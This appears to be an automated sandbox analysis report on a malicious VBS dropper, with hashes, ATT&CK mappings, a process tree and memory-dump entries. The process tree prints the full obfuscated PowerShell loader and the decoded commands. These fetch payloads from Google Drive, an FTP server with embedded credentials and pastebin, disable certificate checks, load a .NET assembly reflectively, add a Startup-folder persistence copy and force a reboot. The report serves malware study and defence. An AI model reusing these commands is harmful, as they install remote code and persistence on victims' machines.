1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726

General

Target

1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs
Size

681KB
MD5

1794218436b165f2161c183c0af24a53
SHA1

53d26bff0dac5b9424d6e21ab7aa80c5b20753cc
SHA256

1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726
SHA512

059e2d5fecd7bf2cfdef7d47c4bfb424344cd28d282e1f979f2b2e0d3afa7dda98f0c441fe93a8be93de0a4ae70d28aedeeae51012b21532b11cbe45cfcbf143
SSDEEP

1536:4vvvvvvvvvvvvvvvvvvvvvvvL88888888888888888888888888888888888888F:4MZe1

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2880	powershell.exe
2288	powershell.exe
2640	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2880	powershell.exe
2288	powershell.exe
2704	powershell.exe
2640	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1580 wrote to memory of 2880	1580	WScript.exe	30
PID 1580 wrote to memory of 2880	1580	WScript.exe	30
PID 1580 wrote to memory of 2880	1580	WScript.exe	30
PID 2880 wrote to memory of 2288	2880	powershell.exe	32
PID 2880 wrote to memory of 2288	2880	powershell.exe	32
PID 2880 wrote to memory of 2288	2880	powershell.exe	32
PID 2288 wrote to memory of 2704	2288	powershell.exe	33
PID 2288 wrote to memory of 2704	2288	powershell.exe	33
PID 2288 wrote to memory of 2704	2288	powershell.exe	33
PID 2704 wrote to memory of 2712	2704	powershell.exe	34
PID 2704 wrote to memory of 2712	2704	powershell.exe	34
PID 2704 wrote to memory of 2712	2704	powershell.exe	34
PID 2288 wrote to memory of 2640	2288	powershell.exe	35
PID 2288 wrote to memory of 2640	2288	powershell.exe	35
PID 2288 wrote to memory of 2640	2288	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$mpAQs = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉGUШḆЉdQByШḆЉHQШḆЉJwШḆЉgШḆЉCwШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉgШḆЉCwШḆЉIШḆЉШḆЉnШḆЉGgШḆЉdШḆЉB0ШḆЉHШḆЉШḆЉcwШḆЉ6ШḆЉC8ШḆЉLwBwШḆЉGEШḆЉcwB0ШḆЉGUШḆЉYgBpШḆЉG4ШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉHIШḆЉYQB3ШḆЉC8ШḆЉZQBUШḆЉHMШḆЉMwBUШḆЉDkШḆЉWШḆЉBmШḆЉCcШḆЉIШḆЉШḆЉoШḆЉCШḆЉШḆЉXQBdШḆЉFsШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉG8ШḆЉWwШḆЉgШḆЉCwШḆЉIШḆЉBsШḆЉGwШḆЉdQBuШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGUШḆЉawBvШḆЉHYШḆЉbgBJШḆЉC4ШḆЉKQШḆЉgШḆЉCcШḆЉSQBWШḆЉEYШḆЉcgBwШḆЉCcШḆЉIШḆЉШḆЉoШḆЉGQШḆЉbwBoШḆЉHQШḆЉZQBNШḆЉHQШḆЉZQBHШḆЉC4ШḆЉKQШḆЉnШḆЉDEШḆЉcwBzШḆЉGEШḆЉbШḆЉBDШḆЉC4ШḆЉMwB5ШḆЉHIШḆЉYQByШḆЉGIШḆЉaQBMШḆЉHMШḆЉcwBhШḆЉGwШḆЉQwШḆЉnШḆЉCgШḆЉZQBwШḆЉHkШḆЉVШḆЉB0ШḆЉGUШḆЉRwШḆЉuШḆЉCkШḆЉIШḆЉB4ШḆЉG0ШḆЉegBYШḆЉHgШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZШḆЉBhШḆЉG8ШḆЉTШḆЉШḆЉuШḆЉG4ШḆЉaQBhШḆЉG0ШḆЉbwBEШḆЉHQШḆЉbgBlШḆЉHIШḆЉcgB1ШḆЉEMШḆЉOgШḆЉ6ШḆЉF0ШḆЉbgBpШḆЉGEШḆЉbQBvШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉEEШḆЉJwШḆЉgШḆЉCwШḆЉIШḆЉШḆЉnШḆЉJMhOgCTIScШḆЉIШḆЉШḆЉoШḆЉGUШḆЉYwBhШḆЉGwШḆЉcШḆЉBlШḆЉFIШḆЉLgBRШḆЉGoШḆЉbgB3ШḆЉGwШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉNШḆЉШḆЉ2ШḆЉGUШḆЉcwBhШḆЉEIШḆЉbQBvШḆЉHIШḆЉRgШḆЉ6ШḆЉDoШḆЉXQB0ШḆЉHIШḆЉZQB2ШḆЉG4ШḆЉbwBDШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉB4ШḆЉG0ШḆЉegBYШḆЉHgШḆЉJШḆЉШḆЉgШḆЉF0ШḆЉXQBbШḆЉGUШḆЉdШḆЉB5ШḆЉEIШḆЉWwШḆЉ7ШḆЉCcШḆЉJQBJШḆЉGgШḆЉcQBSШḆЉFgШḆЉJQШḆЉnШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉFEШḆЉagBuШḆЉHcШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉGoШḆЉbgB3ШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉDgШḆЉRgBUШḆЉFUШḆЉOgШḆЉ6ШḆЉF0ШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉdШḆЉB4ШḆЉGUШḆЉVШḆЉШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉpШḆЉHQШḆЉbgBlШḆЉGkШḆЉbШḆЉBDШḆЉGIШḆЉZQBXШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉTwШḆЉtШḆЉHcШḆЉZQBOШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉpШḆЉCgШḆЉZQBzШḆЉG8ШḆЉcШḆЉBzШḆЉGkШḆЉZШḆЉШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉCcШḆЉdШḆЉB4ШḆЉHQШḆЉLgШḆЉxШḆЉDШḆЉШḆЉTШḆЉBMШḆЉEQШḆЉLwШḆЉxШḆЉDШḆЉШḆЉLwByШḆЉGUШḆЉdШḆЉBwШḆЉHkШḆЉcgBjШḆЉHШḆЉШḆЉVQШḆЉvШḆЉHIШḆЉYgШḆЉuШḆЉG0ШḆЉbwBjШḆЉC4ШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉuШḆЉHШḆЉШḆЉdШḆЉBmШḆЉEШḆЉШḆЉMQB0ШḆЉGEШḆЉcgBiШḆЉHYШḆЉawBjШḆЉHMШḆЉZQBkШḆЉC8ШḆЉLwШḆЉ6ШḆЉHШḆЉШḆЉdШḆЉBmШḆЉCcШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉPQШḆЉgШḆЉFEШḆЉagBuШḆЉHcШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉEШḆЉШḆЉQШḆЉBwШḆЉEoШḆЉOШḆЉШḆЉ3ШḆЉDUШḆЉMQШḆЉyШḆЉG8ШḆЉcgBwШḆЉHIШḆЉZQBwШḆЉG8ШḆЉbШḆЉBlШḆЉHYШḆЉZQBkШḆЉCcШḆЉLШḆЉШḆЉnШḆЉDEШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCgШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwBrШḆЉHIШḆЉbwB3ШḆЉHQШḆЉZQBOШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBvШḆЉC0ШḆЉdwBlШḆЉG4ШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉcwBsШḆЉGEШḆЉaQB0ШḆЉG4ШḆЉZQBkШḆЉGUШḆЉcgBDШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉ4ШḆЉEYШḆЉVШḆЉBVШḆЉDoШḆЉOgBdШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉHQШḆЉeШḆЉBlШḆЉFQШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQB0ШḆЉG4ШḆЉZQBpШḆЉGwШḆЉQwBiШḆЉGUШḆЉVwШḆЉuШḆЉHQШḆЉZQBOШḆЉCШḆЉШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉE8ШḆЉLQB3ШḆЉGUШḆЉTgШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉUQBqШḆЉG4ШḆЉdwBsШḆЉCQШḆЉOwШḆЉyШḆЉDEШḆЉcwBsШḆЉFQШḆЉOgШḆЉ6ШḆЉF0ШḆЉZQBwШḆЉHkШḆЉVШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGwШḆЉbwBjШḆЉG8ШḆЉdШḆЉBvШḆЉHIШḆЉUШḆЉB5ШḆЉHQШḆЉaQByШḆЉHUШḆЉYwBlШḆЉFMШḆЉOgШḆЉ6ШḆЉF0ШḆЉcgBlШḆЉGcШḆЉYQBuШḆЉGEШḆЉTQB0ШḆЉG4ШḆЉaQBvШḆЉFШḆЉШḆЉZQBjШḆЉGkШḆЉdgByШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉH0ШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉkШḆЉHsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉawBjШḆЉGEШḆЉYgBsШḆЉGwШḆЉYQBDШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBkШḆЉGkШḆЉbШḆЉBhШḆЉFYШḆЉZQB0ШḆЉGEШḆЉYwBpШḆЉGYШḆЉaQB0ШḆЉHIШḆЉZQBDШḆЉHIШḆЉZQB2ШḆЉHIШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉgШḆЉGYШḆЉLwШḆЉgШḆЉDШḆЉШḆЉIШḆЉB0ШḆЉC8ШḆЉIШḆЉByШḆЉC8ШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉG4ШḆЉdwBvШḆЉGQШḆЉdШḆЉB1ШḆЉGgШḆЉcwШḆЉgШḆЉDsШḆЉJwШḆЉwШḆЉDgШḆЉMQШḆЉgШḆЉHШḆЉШḆЉZQBlШḆЉGwШḆЉcwШḆЉnШḆЉCШḆЉШḆЉZШḆЉBuШḆЉGEШḆЉbQBtШḆЉG8ШḆЉYwШḆЉtШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉDsШḆЉIШḆЉBlШḆЉGMШḆЉcgBvШḆЉGYШḆЉLQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHШḆЉШḆЉdQB0ШḆЉHIШḆЉYQB0ШḆЉFMШḆЉXШḆЉBzШḆЉG0ШḆЉYQByШḆЉGcШḆЉbwByШḆЉFШḆЉШḆЉXШḆЉB1ШḆЉG4ШḆЉZQBNШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwB3ШḆЉG8ШḆЉZШḆЉBuШḆЉGkШḆЉVwBcШḆЉHQШḆЉZgBvШḆЉHMШḆЉbwByШḆЉGMШḆЉaQBNШḆЉFwШḆЉZwBuШḆЉGkШḆЉbQBhШḆЉG8ШḆЉUgBcШḆЉGEШḆЉdШḆЉBhШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBuШḆЉGkШḆЉdШḆЉBzШḆЉGUШḆЉRШḆЉШḆЉtШḆЉCШḆЉШḆЉJwШḆЉlШḆЉEkШḆЉaШḆЉBxШḆЉFIШḆЉWШḆЉШḆЉlШḆЉCcШḆЉIШḆЉBtШḆЉGUШḆЉdШḆЉBJШḆЉC0ШḆЉeQBwШḆЉG8ШḆЉQwШḆЉgШḆЉDsШḆЉIШḆЉB0ШḆЉHIШḆЉYQB0ШḆЉHMШḆЉZQByШḆЉG8ШḆЉbgШḆЉvШḆЉCШḆЉШḆЉdШḆЉBlШḆЉGkШḆЉdQBxШḆЉC8ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGEШḆЉcwB1ШḆЉHcШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGwШḆЉbШḆЉBlШḆЉGgШḆЉcwByШḆЉGUШḆЉdwBvШḆЉHШḆЉШḆЉIШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉcШḆЉBqШḆЉEwШḆЉagBNШḆЉCQШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉOwШḆЉpШḆЉCШḆЉШḆЉZQBtШḆЉGEШḆЉTgByШḆЉGUШḆЉcwBVШḆЉDoШḆЉOgBdШḆЉHQШḆЉbgBlШḆЉG0ШḆЉbgBvШḆЉHIШḆЉaQB2ШḆЉG4ШḆЉRQBbШḆЉCШḆЉШḆЉKwШḆЉgШḆЉCcШḆЉXШḆЉBzШḆЉHIШḆЉZQBzШḆЉFUШḆЉXШḆЉШḆЉ6ШḆЉEMШḆЉJwШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉHUШḆЉcwBtШḆЉC4ШḆЉbgBpШḆЉHcШḆЉcШḆЉBVШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉGoШḆЉTШḆЉBqШḆЉE0ШḆЉJШḆЉШḆЉgШḆЉCwШḆЉQgBLШḆЉEwШḆЉUgBVШḆЉCQШḆЉKШḆЉBlШḆЉGwШḆЉaQBGШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉGMШḆЉWQBCШḆЉHkШḆЉTgШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBjШḆЉFkШḆЉQgB5ШḆЉE4ШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBjШḆЉFkШḆЉQgB5ШḆЉE4ШḆЉJШḆЉШḆЉ7ШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwByШḆЉGcШḆЉOШḆЉBEШḆЉDcШḆЉbwBSШḆЉHMШḆЉZgBWШḆЉGMШḆЉcgШḆЉyШḆЉG4ШḆЉQQBoШḆЉGYШḆЉaШḆЉBWШḆЉDYШḆЉRШḆЉBDШḆЉHgШḆЉUgBxШḆЉG4ШḆЉcQBqШḆЉDUШḆЉagByШḆЉGIШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉUШḆЉBwШḆЉFYШḆЉaQBzШḆЉCQШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉ7ШḆЉCШḆЉШḆЉKQШḆЉnШḆЉHgШḆЉNШḆЉBmШḆЉGgШḆЉWgBNШḆЉHcШḆЉTgШḆЉ3ШḆЉFUШḆЉZQBfШḆЉDШḆЉШḆЉXwШḆЉ1ШḆЉF8ШḆЉaQBjШḆЉHMШḆЉYgBoШḆЉDcШḆЉQwBQШḆЉDШḆЉШḆЉSQBmШḆЉFШḆЉШḆЉZШḆЉBBШḆЉDIШḆЉMQШḆЉxШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCAAUABwAFYAaQBzACQAKAAgAD0AIABQAHAAVgBpAHMAJAB7ACAAKQBvAEcAZgBEAFEAJAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABvAEcAZgBEAFEAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACШḆЉAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAawBjAEoASABlACQAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAGsAYwBKAEgAZQAkACAAOwA=';$tYYYr = $mpAQs.replace('ШḆЉ' , 'A') ;$bZIaf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $tYYYr ) ); $bZIaf = $bZIaf[-1..-$bZIaf.Length] -join '';$bZIaf = $bZIaf.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs');powershell $bZIaf
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $eHJck = $host.Version.Major.Equals(2) ;if ($eHJck) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($QDfGo) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$NyBYc = (New-Object Net.WebClient);$NyBYc.Encoding = [System.Text.Encoding]::UTF8;$NyBYc.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lwnjQ;$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lqVmC.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lwnjQ = $lqVmC.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lqVmC.dispose();$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lwnjQ = $lqVmC.DownloadString( $lwnjQ );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $lwnjQ.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'fX9T3sTe/war/moc.nibetsap//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2704
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bf14b26aba219ebf22a764c49d9e5927

SHA1
bc8b18523c07608cd8b2a07472856f025bfda905

SHA256
82426388741d75e5f5d06e58116cf9ca72568d794944a6744fac31f006f58538

SHA512
3279e05955c031fcc65653ab837dbd74f2c2ae57338295d30d7b3f960149587317bb7c0dfa9800c256dd4312c8e4eedabd43b5458ca64a64b9d882677317ff20

Download Submit
memory/2880-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

Filesize
4KB

Download
memory/2880-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-6-0x0000000000570000-0x0000000000578000-memory.dmp

Filesize
32KB

Download
memory/2880-5-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2880-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-29-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

Filesize
4KB

Download
memory/2880-30-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing